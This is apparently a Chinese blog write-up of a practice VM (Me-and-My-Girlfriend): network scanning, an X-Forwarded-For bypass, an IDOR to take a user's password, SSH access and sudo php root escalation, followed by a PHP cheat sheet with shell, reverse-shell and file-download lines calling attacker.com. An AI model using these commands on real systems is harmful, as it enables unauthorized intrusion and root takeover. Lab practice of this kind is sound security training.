靶场练习第一天
|
113
|
0
|
靶场练兵

569 字
|
5 分钟

一. 下载靶机:

二. 安装靶机并切换网络模式为NAT模式

三. 先获取靶机ip地址:

arp-scan -l

Me-and-My-Girlfriend_01

四. 进行端口扫描,发现开放了80端口和22端口

nmap -sV -O -A 192.168.133.131

Me-and-My-Girlfriend_02

五. 访问靶机web网站,发现只允许本地访问,右键查看源码,发现有其他信息;

Me-and-My-Girlfriend_03

六. 提示可以使用x-forwarded-for进行绕过:(使用一个火狐的识别IP地址的插件

X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入 RFC 7239(Forwarded HTTP Extension)标准之中。

Me-and-My-Girlfriend_04

七. 安装并使用该插件,然后写入127.0.0.1IP地址,刷新网页即可出现网页内容:

Me-and-My-Girlfriend_05

八. 存在登录,注册等页面。

随便注册一个账号尝试登录这个网站

成功登录该网站发现http://192.168.133.131/index.php?page=profile&user_id=5,id后面改动数字后用户随之改变,利用这一点,尝试登录alice的账号

Me-and-My-Girlfriend_06

九. 获取alice的账户密码之后,尝试使用账密连接SSH服务,

成功登录该用户后,查看相关权限与文件,发现了flage.txt文件

ssh [email protected]

Me-and-My-Girlfriend_07

十. Sudo -l 查看alice用户权限,发现php有bash权限,可以使用php回调提权:

Me-and-My-Girlfriend_08

十一. 直接进行提权即可:

sudo php -r ‘system("/bin/bash");’ php回调bash提权

Me-and-My-Girlfriend_09

php提权姿势:

Shell
Command
Reverse Shell
File upload
File download
SUID
Sudo
Capabilities

Shell

export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));'
export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));'
export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'
export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'

Command

export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'

Reverse Shell

目标机

nc -lp 4444
export RHOST=attacker.com
export RPORT=4444
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'

File upload

php version5.4或以上

LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT

File download

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

SUID

sudo sh -c 'cp $(which php) .; chmod +s ./php'

CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"

Sudo

CMD="/bin/sh"
sudo php -r "system('$CMD');"

Capabilities

cp $(which php) .
sudo setcap cap_setuid+ep php

CMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');"
本博客内容均属原创,未经允许严禁转载!
权限提升网络安全靶机练习
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
															
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇
下一篇 



    
Copyright ©2024 版权所有 万维屋
    
Theme Argon

	





 | 耗时 0.100 秒 | 查询 10 次 | 内存 4.60 MB |